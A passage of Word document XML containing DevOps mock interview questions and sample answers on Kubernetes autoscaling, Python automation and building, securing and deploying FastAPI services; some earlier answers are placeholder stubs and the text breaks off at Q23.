        <w:t>A: A strong answer should directly address the Web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Content Security Policy (CSP) do?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q24. How does Cluster Autoscaler work in Kubernetes/GKE?</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Cluster Autoscaler work in Kubernetes/GKE?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q25. Do you have real-time monitoring for the Kubernetes cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability/GKE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability/GKE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real-time monitoring for the Kubernetes cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q26. If there is a sudden spike in traffic, how does autoscaling work in real time?</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there is a sudden spike in traffic, how does autoscaling work in real time?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q27. I am referring to node autoscaling, not pod autoscaling. How does node autoscaling work?</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 am referring to node autoscaling, not pod autoscaling. How does node autoscaling work?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q28. What happens if, due to some unknown issue, the Cluster Autoscaler keeps creating new nodes?</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due to some unknown issue, the Cluster Autoscaler keeps creating new nodes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q29. How do you control the cloud cost when Cluster Autoscaler keeps scaling nodes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud Cost/Governance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Cloud Cost/Governance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control the cloud cost when Cluster Autoscaler keeps scaling nodes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 74 - Python Automation and FastAPI DevOps Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. How have you used Python for DevOps automation in real projects?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Automation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I use Python mainly where automation needs structure, APIs, error handling, and maintainability. Examples include calling cloud APIs, validating Kubernetes manifests, generating reports from logs or metrics, checking IAM or security posture, automating deployment checks, and building small internal tools. For a senior DevOps role, I do not treat Python scripts as one-off files. I add configuration, logging, retries, dry-run mode, clear exit codes, tests for critical logic, and documentation so the team can run the automation safely.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. How would you design a Python script to automate repeated cloud or Kubernetes operational tasks?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Automation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would first define the exact operational workflow and failure modes. Then I would design the script with configuration through environment variables or a config file, argument parsing with argparse or Typer, structured logging, input validation, and a dry-run option. For Kubernetes I would use the Kubernetes Python client or call kubectl only when that is the team standard. For cloud operations I would use the official SDK. I would make the script idempotent, add retries with backoff for transient failures, return meaningful exit codes, and run it in CI, CronJob, Cloud Run job, or a controlled automation runner.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. How do you handle errors, retries, logging, and exit codes in production Python automation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Automation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I handle expected errors explicitly and fail fast on unsafe conditions. For transient errors such as API rate limits, network timeouts, or temporary 5xx responses, I use retries with exponential backoff and a maximum retry limit. Logs should be structured and include operation name, resource name, environment, correlation ID if available, and final status. Exit code 0 means success, non-zero means failure, and different exit codes can represent validation failure, authentication failure, or partial execution. For production automation, silent failure is dangerous, so failed runs should alert or create a visible ticket.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. When would you choose Python over Bash for automation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Automation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I choose Bash for simple command orchestration, such as running a few shell commands in sequence. I choose Python when the automation needs API calls, JSON parsing, data transformation, complex conditionals, tests, reusable modules, better error handling, or long-term maintainability. For example, a five-line deployment helper can be Bash, but a tool that checks Kubernetes resources, queries cloud APIs, builds a report, and applies conditional remediation should be Python.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. How would you securely handle credentials and secrets in a Python automation script?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Automation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would avoid hardcoding secrets or passing them through command history. In cloud environments, I prefer workload identity, service accounts, managed identities, or short-lived credentials. If the script needs a secret, it should read it from Secret Manager, Vault, AWS Secrets Manager, Azure Key Vault, or the platform-approved secret store. I would avoid logging secret values, mask sensitive fields, restrict IAM permissions to least privilege, and rotate credentials. For local development, I would use environment variables or a local credentials flow, but never commit secrets to Git.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. How do you make Python automation idempotent?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Automation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Idempotency means running the automation multiple times should produce the same final state without causing duplicate or unsafe changes. I do this by checking current state before making changes, comparing desired state versus actual state, using stable resource names, avoiding blind create operations, and making updates conditional. For example, before creating a Kubernetes namespace or IAM binding, the script should check whether it already exists. I also add dry-run output so reviewers can see what would change before execution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. How would you schedule and run Python automation in production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Automation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: It depends on the use case. For scheduled operational jobs, I can run Python as a Kubernetes CronJob, Cloud Scheduler plus Cloud Run job, GitHub Actions, Jenkins scheduled job, Airflow DAG, or a VM cron if the environment is simpler. For production, I care about identity, logs, retries, timeout, concurrency control, alerting, and auditability. I would also prevent overlapping runs if the automation changes shared resources.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. How would you package and deploy a Python automation tool for a team?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Automation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would package it as a proper Python project with pyproject.toml, reusable modules, a CLI entry point, pinned dependencies, tests, linting, and versioning. For execution, I might publish it as an internal package, build a Docker image, or run it as a CI/CD job. The team should get a clear command interface, examples, dry-run mode, and documentation. For sensitive automation, I would add approval gates and least-privilege runtime identity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. What is FastAPI and why would you choose it for backend APIs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: FastAPI is a modern Python web framework for building APIs. I would choose it because it is fast, developer-friendly, supports async, uses Pydantic for validation, generates OpenAPI documentation automatically, and integrates well with testing, authentication, containers, and cloud deployment. For DevOps or platform teams, FastAPI is useful for internal developer portals, automation APIs, webhook receivers, deployment tools, and service integrations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. How do you create a basic GET and POST API in FastAPI?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: In FastAPI, we create an app object and define route functions with decorators like @app.get and @app.post. A GET endpoint is usually used to read data, and a POST endpoint is used to create or trigger something. For request bodies, I use Pydantic models so FastAPI validates input automatically. In production, I also add proper response models, status codes, error handling, authentication, logging, and tests.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. How does request validation work in FastAPI?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI/Validation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: FastAPI uses type hints and Pydantic models to validate request path parameters, query parameters, headers, and JSON bodies. If a request does not match the expected schema, FastAPI returns a validation error before the business logic runs. This is useful because invalid input is rejected consistently. For production APIs, I define strict models, avoid accepting arbitrary fields unless needed, validate ranges and formats, and keep request and response models explicit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. How would you implement authentication and authorization in a FastAPI application?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI/Auth</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: For authentication, I would normally use OAuth2, JWT, API keys, or an identity provider depending on the environment. In FastAPI, dependencies are a clean way to validate tokens or API keys before the endpoint runs. Authorization is separate: after identifying the caller, I check roles, scopes, groups, tenant, or resource-level permissions. For internal services, I may also use mTLS or identity-aware proxy at the platform layer. I would log authentication failures carefully without exposing tokens.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. How does a FastAPI application read and write data to a database?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI/Database</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A FastAPI app usually uses a database library or ORM such as SQLAlchemy, SQLModel, asyncpg, psycopg, or a cloud-specific client. The endpoint receives and validates the request, calls a service layer, performs database operations through a session or connection pool, commits changes, and returns a response model. In production, I separate route logic from business logic, use migrations such as Alembic or Liquibase, configure connection pooling, handle transaction rollback, and avoid leaking database errors to clients.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. What is the difference between sync and async endpoints in FastAPI?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI/Async</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A sync endpoint uses normal def and blocks the worker while it runs. An async endpoint uses async def and can release control while waiting for non-blocking I/O, such as async database calls or HTTP calls. Async helps when the application has many I/O-bound operations, but it only works well if the libraries are also async. For CPU-heavy work, async is not the solution; I would use background workers, queues, multiprocessing, or separate services.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. How would you test a FastAPI application?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI/Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would write unit tests for business logic and API tests using FastAPI TestClient or httpx. Tests should cover successful requests, validation failures, authentication failures, authorization checks, database behavior, and error responses. For database tests, I can use a test database, transaction rollback, or containers. In CI, I would run formatting, linting, type checks where useful, unit tests, integration tests, and security/dependency scans.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. How would you containerize and run a FastAPI application using Docker?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI/Docker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would create a Dockerfile that starts from a slim Python base image, installs dependencies, copies application code, uses a non-root user where possible, exposes the service port, and starts the app with uvicorn or gunicorn with uvicorn workers. I would pin dependencies, keep the image small, avoid copying secrets, and add health checks at the platform level. Locally I would run it with docker run -p 8000:8000, and in CI I would tag the image with the commit SHA.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q17. How would you deploy a FastAPI application on Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would build and push the Docker image to a registry, then deploy it using a Kubernetes Deployment, Service, ConfigMap, Secret, and optionally Ingress. The Deployment should define requests and limits, readiness and liveness probes, environment variables, security context, and image tag. The Service exposes the Pods internally, and Ingress or a load balancer exposes it externally if required. I would use rolling deployment or canary, monitor error rate and latency, and keep rollback simple through image versioning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q18. How would you add logging, metrics, and tracing to a FastAPI application?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI/Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: For logging, I would use structured JSON logs with fields like timestamp, level, service, route, status code, latency, request ID, and trace ID. For metrics, I would expose Prometheus metrics or use OpenTelemetry metrics for request count, latency, errors, and dependency calls. For tracing, I would instrument FastAPI with OpenTelemetry and export traces to Jaeger, Tempo, Cloud Trace, Datadog, or another backend. The key is correlation: logs, metrics, and traces should connect through request ID or trace ID.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q19. What security best practices would you follow for FastAPI APIs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI/Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would enforce authentication and authorization, validate all inputs, use HTTPS, configure CORS carefully, avoid exposing stack traces, sanitize logs, protect secrets, use dependency scanning, add rate limiting where needed, and follow least privilege for database and cloud access. I would also add security headers at the gateway or app layer, keep dependencies updated, use non-root containers, scan images, and log security-relevant events without leaking sensitive data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q20. How would you improve performance and scalability for a FastAPI service?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI/Performance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would first measure latency, throughput, error rate, CPU, memory, and database performance. Then I would tune the worker count, use async only where it helps, add connection pooling, cache expensive reads, optimize database queries, move long-running work to background queues, and scale horizontally on Kubernetes with HPA. I would also run load tests with tools like k6, Locust, or JMeter and define scaling based on real bottlenecks, not guesswork.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q21. How would you design a CI/CD pipeline for a Python FastAPI service?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI/CI/CD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The pipeline should start from a pull request. It runs formatting, linting, tests, dependency scanning, secret scanning, and optionally type checks. After merge, it builds a Docker image, scans the image, pushes it to the registry, and deploys to a lower environment. Production deployment should use approvals, immutable image tags, rollout health checks, monitoring validation, and rollback. For Kubernetes, the deployment can be done with Helm, Kustomize, ArgoCD, Jenkins, GitHub Actions, Cloud Build, or another approved tool.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q22. A FastAPI service is returning intermittent 500 errors in Kubernetes. How would you troubleshoot it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI/Troubleshooting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would start with impact and timeline: when did errors start, which routes are affected, and whether it aligns with a deployment or traffic spike. Then I would check application logs with request IDs, Kubernetes events, Pod restarts, readiness failures, resource throttling, memory OOM kills, database connection errors, dependency timeouts, and ingress/load balancer metrics. I would compare failing and healthy Pods, check recent config or secret changes, inspect traces if available, and mitigate quickly by rollback, scaling, or disabling a bad dependency path.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q23. Design a production-ready FastAPI service for an internal DevOps automation platform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/FastAPI/System Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
